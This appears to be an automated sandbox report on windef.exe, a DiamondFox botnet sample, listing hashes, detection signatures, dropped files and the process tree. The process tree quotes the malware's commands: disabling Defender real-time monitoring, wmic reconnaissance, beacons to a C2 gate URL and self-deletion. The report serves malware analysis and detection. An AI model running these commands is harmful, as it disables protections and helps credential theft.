Analysis

  • max time kernel
    126s
  • max time network
    168s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    04-07-2021 00:03

General

  • Target

    windef.exe

  • Size

    203KB

  • MD5

    a1e165e1926c0c83123c89fce6b1af56

  • SHA1

    281246ba4b852a5f62e032424f7816f5a6b0406f

  • SHA256

    2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

  • SHA512

    28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Malware Config

Signatures

  • DiamondFox

    DiamondFox is a multipurpose botnet with many capabilities.

  • DiamondFox payload 13 IoCs

    Detects DiamondFox payload in file/memory.

  • NirSoft MailPassView 3 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 3 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 9 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 10 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 4 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\windef.exe
    "C:\Users\Admin\AppData\Local\Temp\windef.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1072
    • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
      "C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1668
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:284
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1424
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic" os get caption /FORMAT:List
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1112
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic" path win32_VideoController get caption /FORMAT:List
        3⤵
          PID:1684
        • C:\Windows\SysWOW64\Wbem\wmic.exe
          "wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
          3⤵
            PID:1072
          • C:\Windows\SysWOW64\Wbem\wmic.exe
            "wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
            3⤵
              PID:300
            • C:\Windows\SysWOW64\Wbem\wmic.exe
              "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
              3⤵
                PID:864
              • C:\Windows\SysWOW64\Wbem\wmic.exe
                "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
                3⤵
                  PID:956
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  /scomma "C:\Users\Admin\AppData\Local\Temp\1.log"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1636
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  /scomma "C:\Users\Admin\AppData\Local\Temp\4.log"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:1544
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  /scomma "C:\Users\Admin\AppData\Local\Temp\2.log"
                  3⤵
                  • Executes dropped EXE
                  PID:1684
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  /scomma "C:\Users\Admin\AppData\Local\Temp\3.log"
                  3⤵
                  • Executes dropped EXE
                  PID:2016
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
                  3⤵
                  • Executes dropped EXE
                  PID:824
                  • C:\Windows\notepad.exe
                    X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                    4⤵
                    • Opens file in notepad (likely ransom note)
                    PID:644
                  • C:\Windows\write.exe
                    X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                    4⤵
                      PID:300
                  • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:1052
                  • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:1664
                  • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
                    3⤵
                    • Executes dropped EXE
                    PID:1220
                  • C:\Windows\SysWOW64\Wbem\wmic.exe
                    "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
                    3⤵
                      PID:1688
                    • C:\Windows\SysWOW64\Wbem\wmic.exe
                      "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
                      3⤵
                        PID:768
                      • C:\Windows\SysWOW64\taskkill.exe
                        "taskkill" /PID 824 /F
                        3⤵
                        • Kills process with taskkill
                        PID:1980
                      • C:\Windows\SysWOW64\taskkill.exe
                        "taskkill" /PID 1052 /F
                        3⤵
                        • Kills process with taskkill
                        PID:2028
                      • C:\Windows\SysWOW64\taskkill.exe
                        "taskkill" /PID 1664 /F
                        3⤵
                        • Kills process with taskkill
                        PID:1212
                      • C:\Windows\SysWOW64\taskkill.exe
                        "taskkill" /PID 1220 /F
                        3⤵
                        • Kills process with taskkill
                        PID:1564
                      • C:\Windows\SysWOW64\Wbem\wmic.exe
                        "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
                        3⤵
                          PID:1556
                        • C:\Windows\SysWOW64\Wbem\wmic.exe
                          "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
                          3⤵
                            PID:536
                          • C:\Users\Admin\AppData\Local\Temp\localmgr.exe
                            "C:\Users\Admin\AppData\Local\Temp\localmgr.exe"
                            3⤵
                            • Executes dropped EXE
                            PID:1704
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\windef.exe' -Force -Recurse
                          2⤵
                          • Deletes itself
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1640

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Credential Access

                      Credentials in Files

                      2
                      T1081

                      Discovery

                      Query Registry

                      1
                      T1012

                      System Information Discovery

                      1
                      T1082

                      Collection

                      Data from Local System

                      2
                      T1005

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5
                        MD5

                        02ff38ac870de39782aeee04d7b48231

                        SHA1

                        0390d39fa216c9b0ecdb38238304e518fb2b5095

                        SHA256

                        fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

                        SHA512

                        24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d686436-375c-4ee1-bd4a-9e44ccd248ba
                        MD5

                        75a8da7754349b38d64c87c938545b1b

                        SHA1

                        5c28c257d51f1c1587e29164cc03ea880c21b417

                        SHA256

                        bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

                        SHA512

                        798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375eeb7-a65d-43f1-a616-02c5ad6c5370
                        MD5

                        be4d72095faf84233ac17b94744f7084

                        SHA1

                        cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

                        SHA256

                        b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

                        SHA512

                        43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe5bd95-2cea-4aea-9c8c-dd67bac4295b
                        MD5

                        df44874327d79bd75e4264cb8dc01811

                        SHA1

                        1396b06debed65ea93c24998d244edebd3c0209d

                        SHA256

                        55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

                        SHA512

                        95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc2fe8ee-69c0-48ce-8821-1fab80ab4eeb
                        MD5

                        597009ea0430a463753e0f5b1d1a249e

                        SHA1

                        4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

                        SHA256

                        3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

                        SHA512

                        5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa12b0a1-3d6a-4bab-a74a-253a75ca0598
                        MD5

                        5e3c7184a75d42dda1a83606a45001d8

                        SHA1

                        94ca15637721d88f30eb4b6220b805c5be0360ed

                        SHA256

                        8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

                        SHA512

                        fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4c
                        MD5

                        a725bb9fafcf91f3c6b7861a2bde6db2

                        SHA1

                        8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

                        SHA256

                        51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

                        SHA512

                        1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe80cd26-0cf7-4e38-9884-6dab53b04ca9
                        MD5

                        b6d38f250ccc9003dd70efd3b778117f

                        SHA1

                        d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

                        SHA256

                        4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

                        SHA512

                        67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        MD5

                        19ff3cb6ea3c288c2056d4cf611d3479

                        SHA1

                        cfe0d68b358dac37f14de0ec3c8ab070945d412a

                        SHA256

                        5de04cda047c74cdad37bf6c95de02bba8ac88642f836dc3f5842c02940f5c6e

                        SHA512

                        3bc886faefccd7cd5069c2703b18cab44d4f021f9cceebe59de4c979fdae2026edf66fa2c97b3902e6a3f177705870c5831fdf5174f22b6200d909b8a1985111

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        MD5

                        c9974c72aeb2e34aee7aacaae77f8fde

                        SHA1

                        fbebecc790d96055fa5e9d181ef6186181d67cc8

                        SHA256

                        f200623df5d54101febe1cd0455f024a21904e1ffa1572401cc4c1e10fcbe56c

                        SHA512

                        37ffd4d8dc524f9a35afdf9664c90286a7c42c4039757dc2ab587b18923ad2fa2b3876aa59b4dafa042d3859a5537d60ed2133914746889ddf12367cd0eb0992

                      • C:\Users\Admin\AppData\Local\Temp\localmgr.exe
                        MD5

                        f4f7f1f8b8f893bdd621f425646919a5

                        SHA1

                        cc1ccc560723692407ce86972865a956faa62229

                        SHA256

                        fd8ef0b8b997038aa6a4a416298965545e24f6367e364e58ebd6343515b73c8a

                        SHA512

                        7621478e0d0e3036682e76e7db3675d5053a4decff033d75c9608744245b91b970a937f3006f80c6262408f8072b06b74af606c88d4c9a951eda88320275fc03

                      • C:\Users\Admin\AppData\Local\Temp\localmgr.exe
                        MD5

                        f4f7f1f8b8f893bdd621f425646919a5

                        SHA1

                        cc1ccc560723692407ce86972865a956faa62229

                        SHA256

                        fd8ef0b8b997038aa6a4a416298965545e24f6367e364e58ebd6343515b73c8a

                        SHA512

                        7621478e0d0e3036682e76e7db3675d5053a4decff033d75c9608744245b91b970a937f3006f80c6262408f8072b06b74af606c88d4c9a951eda88320275fc03

                      • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                        MD5

                        a1e165e1926c0c83123c89fce6b1af56

                        SHA1

                        281246ba4b852a5f62e032424f7816f5a6b0406f

                        SHA256

                        2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

                        SHA512

                        28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

                      • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                        MD5

                        a1e165e1926c0c83123c89fce6b1af56

                        SHA1

                        281246ba4b852a5f62e032424f7816f5a6b0406f

                        SHA256

                        2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

                        SHA512

                        28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

                      • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                        MD5

                        a1e165e1926c0c83123c89fce6b1af56

                        SHA1

                        281246ba4b852a5f62e032424f7816f5a6b0406f

                        SHA256

                        2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

                        SHA512

                        28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

                      • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                        MD5

                        a1e165e1926c0c83123c89fce6b1af56

                        SHA1

                        281246ba4b852a5f62e032424f7816f5a6b0406f

                        SHA256

                        2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

                        SHA512

                        28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

                      • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                        MD5

                        a1e165e1926c0c83123c89fce6b1af56

                        SHA1

                        281246ba4b852a5f62e032424f7816f5a6b0406f

                        SHA256

                        2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

                        SHA512

                        28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

                      • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                        MD5

                        a1e165e1926c0c83123c89fce6b1af56

                        SHA1

                        281246ba4b852a5f62e032424f7816f5a6b0406f

                        SHA256

                        2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

                        SHA512

                        28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

                      • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                        MD5

                        a1e165e1926c0c83123c89fce6b1af56

                        SHA1

                        281246ba4b852a5f62e032424f7816f5a6b0406f

                        SHA256

                        2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

                        SHA512

                        28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

                      • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                        MD5

                        a1e165e1926c0c83123c89fce6b1af56

                        SHA1

                        281246ba4b852a5f62e032424f7816f5a6b0406f

                        SHA256

                        2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

                        SHA512

                        28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

                      • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                        MD5

                        a1e165e1926c0c83123c89fce6b1af56

                        SHA1

                        281246ba4b852a5f62e032424f7816f5a6b0406f

                        SHA256

                        2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

                        SHA512

                        28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

                      • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                        MD5

                        a1e165e1926c0c83123c89fce6b1af56

                        SHA1

                        281246ba4b852a5f62e032424f7816f5a6b0406f

                        SHA256

                        2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

                        SHA512

                        28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

                      • C:\Users\Admin\AppData\Roaming\EdgeCP\id.conf
                        MD5

                        1acef9212f230eecca139872ddd7a6a0

                        SHA1

                        a35658791f7f23db04e5bc428e6f031ae430db39

                        SHA256

                        cf3e8b6e2c31c8b25749146097afedf8e6560227cc6cf812bc2116468ec14a07

                        SHA512

                        e230a1693ef5688d6ca7daf37ac0f89191272e92fcf45bfa2039579943ce97d7702f62d46a55efda37f07a8b85922c4a4c65befe635c1f097dd3ce333151aa42

                      • C:\Users\Admin\AppData\Roaming\EdgeCP\wallet.conf
                        MD5

                        69bf7238c8e32793411515d8ca5926a9

                        SHA1

                        d6918bcceab927a036b760a82cadd340d83b8ed1

                        SHA256

                        57df56c1be46da0057f1afe0147ac7a700fa4df393bf0b31cabd158939d1cb66

                        SHA512

                        4a3f787a09c553dd6012d0529644d9b0e7ac672be032eead2d7f9db9a64ce46f315ae01771f893d35160cc597e7df2fab2b600f6b3ff5e97ca8df403699299f3

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                        MD5

                        86358822ded5f0341e08e1589102d804

                        SHA1

                        11ffcfedf0225278fa3e9b93fe7d8ba8e741c070

                        SHA256

                        9cf86a2fcb88c3a2fd421c9ae94f71f28339aa2c95309befb0aec3856831cabe

                        SHA512

                        e9b9535636d2c32fb1b34cf0cd82f60b9f5f81b39440a24d773db0a01c4bbf11e77550c9de8ac64c0a35ad8f5d43b493b99f87f9a8561c911a8d619a398b3df4

                      • \Users\Admin\AppData\Local\Temp\localmgr.exe
                        MD5

                        f4f7f1f8b8f893bdd621f425646919a5

                        SHA1

                        cc1ccc560723692407ce86972865a956faa62229

                        SHA256

                        fd8ef0b8b997038aa6a4a416298965545e24f6367e364e58ebd6343515b73c8a

                        SHA512

                        7621478e0d0e3036682e76e7db3675d5053a4decff033d75c9608744245b91b970a937f3006f80c6262408f8072b06b74af606c88d4c9a951eda88320275fc03

                      • \Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                        MD5

                        a1e165e1926c0c83123c89fce6b1af56

                        SHA1

                        281246ba4b852a5f62e032424f7816f5a6b0406f

                        SHA256

                        2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

                        SHA512

                        28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

                      • \Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                        MD5

                        a1e165e1926c0c83123c89fce6b1af56

                        SHA1

                        281246ba4b852a5f62e032424f7816f5a6b0406f

                        SHA256

                        2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

                        SHA512

                        28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

                      • \Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                        MD5

                        a1e165e1926c0c83123c89fce6b1af56

                        SHA1

                        281246ba4b852a5f62e032424f7816f5a6b0406f

                        SHA256

                        2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

                        SHA512

                        28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

                      • memory/284-72-0x0000000004A10000-0x0000000004A11000-memory.dmp
                        Filesize

                        4KB

                      • memory/284-130-0x0000000006310000-0x0000000006311000-memory.dmp
                        Filesize

                        4KB

                      • memory/284-78-0x00000000049D0000-0x00000000049D1000-memory.dmp
                        Filesize

                        4KB

                      • memory/284-79-0x00000000049D2000-0x00000000049D3000-memory.dmp
                        Filesize

                        4KB

                      • memory/284-86-0x0000000004960000-0x0000000004961000-memory.dmp
                        Filesize

                        4KB

                      • memory/284-82-0x0000000002440000-0x0000000002441000-memory.dmp
                        Filesize

                        4KB

                      • memory/284-114-0x00000000055D0000-0x00000000055D1000-memory.dmp
                        Filesize

                        4KB

                      • memory/284-107-0x0000000006240000-0x0000000006241000-memory.dmp
                        Filesize

                        4KB

                      • memory/284-129-0x0000000006300000-0x0000000006301000-memory.dmp
                        Filesize

                        4KB

                      • memory/284-92-0x0000000005610000-0x0000000005611000-memory.dmp
                        Filesize

                        4KB

                      • memory/284-100-0x0000000005750000-0x0000000005751000-memory.dmp
                        Filesize

                        4KB

                      • memory/284-98-0x00000000056B0000-0x00000000056B1000-memory.dmp
                        Filesize

                        4KB

                      • memory/284-70-0x0000000002200000-0x0000000002201000-memory.dmp
                        Filesize

                        4KB

                      • memory/284-94-0x000000007EF30000-0x000000007EF31000-memory.dmp
                        Filesize

                        4KB

                      • memory/284-66-0x0000000000000000-mapping.dmp
                      • memory/300-88-0x0000000000000000-mapping.dmp
                      • memory/536-187-0x0000000000000000-mapping.dmp
                      • memory/768-181-0x0000000000000000-mapping.dmp
                      • memory/824-172-0x0000000000400000-0x0000000000413000-memory.dmp
                        Filesize

                        76KB

                      • memory/824-157-0x0000000000400000-0x0000000000413000-memory.dmp
                        Filesize

                        76KB

                      • memory/824-158-0x0000000000401000-mapping.dmp
                      • memory/864-89-0x0000000000000000-mapping.dmp
                      • memory/956-99-0x0000000000000000-mapping.dmp
                      • memory/1052-173-0x0000000000400000-0x0000000000405000-memory.dmp
                        Filesize

                        20KB

                      • memory/1052-161-0x00000000004010B8-mapping.dmp
                      • memory/1052-160-0x0000000000400000-0x0000000000405000-memory.dmp
                        Filesize

                        20KB

                      • memory/1072-59-0x00000000752F1000-0x00000000752F3000-memory.dmp
                        Filesize

                        8KB

                      • memory/1072-85-0x0000000000000000-mapping.dmp
                      • memory/1112-77-0x0000000000000000-mapping.dmp
                      • memory/1212-184-0x0000000000000000-mapping.dmp
                      • memory/1220-176-0x0000000000401000-mapping.dmp
                      • memory/1220-175-0x0000000000400000-0x0000000000431000-memory.dmp
                        Filesize

                        196KB

                      • memory/1220-180-0x0000000000400000-0x0000000000431000-memory.dmp
                        Filesize

                        196KB

                      • memory/1424-76-0x0000000000000000-mapping.dmp
                      • memory/1544-141-0x0000000000401074-mapping.dmp
                      • memory/1544-140-0x0000000000400000-0x0000000000405000-memory.dmp
                        Filesize

                        20KB

                      • memory/1544-145-0x0000000000400000-0x0000000000405000-memory.dmp
                        Filesize

                        20KB

                      • memory/1556-186-0x0000000000000000-mapping.dmp
                      • memory/1564-185-0x0000000000000000-mapping.dmp
                      • memory/1636-139-0x0000000000400000-0x000000000047C000-memory.dmp
                        Filesize

                        496KB

                      • memory/1636-136-0x00000000004466F4-mapping.dmp
                      • memory/1636-135-0x0000000000400000-0x000000000047C000-memory.dmp
                        Filesize

                        496KB

                      • memory/1640-80-0x0000000001EE0000-0x0000000002B2A000-memory.dmp
                        Filesize

                        12.3MB

                      • memory/1640-65-0x0000000000000000-mapping.dmp
                      • memory/1640-134-0x0000000005620000-0x0000000005621000-memory.dmp
                        Filesize

                        4KB

                      • memory/1640-146-0x0000000006130000-0x0000000006131000-memory.dmp
                        Filesize

                        4KB

                      • memory/1664-174-0x0000000000400000-0x0000000000406000-memory.dmp
                        Filesize

                        24KB

                      • memory/1664-167-0x0000000000400000-0x0000000000406000-memory.dmp
                        Filesize

                        24KB

                      • memory/1664-168-0x0000000000401108-mapping.dmp
                      • memory/1668-62-0x0000000000000000-mapping.dmp
                      • memory/1684-147-0x0000000000400000-0x0000000000422000-memory.dmp
                        Filesize

                        136KB

                      • memory/1684-151-0x0000000000400000-0x0000000000422000-memory.dmp
                        Filesize

                        136KB

                      • memory/1684-148-0x0000000000413E10-mapping.dmp
                      • memory/1684-84-0x0000000000000000-mapping.dmp
                      • memory/1688-179-0x0000000000000000-mapping.dmp
                      • memory/1704-193-0x0000000004E75000-0x0000000004E86000-memory.dmp
                        Filesize

                        68KB

                      • memory/1704-192-0x0000000004E70000-0x0000000004E71000-memory.dmp
                        Filesize

                        4KB

                      • memory/1704-189-0x0000000000000000-mapping.dmp
                      • memory/1980-182-0x0000000000000000-mapping.dmp
                      • memory/2016-156-0x0000000000400000-0x0000000000455000-memory.dmp
                        Filesize

                        340KB

                      • memory/2016-153-0x000000000044412E-mapping.dmp
                      • memory/2016-152-0x0000000000400000-0x0000000000455000-memory.dmp
                        Filesize

                        340KB

                      • memory/2028-183-0x0000000000000000-mapping.dmp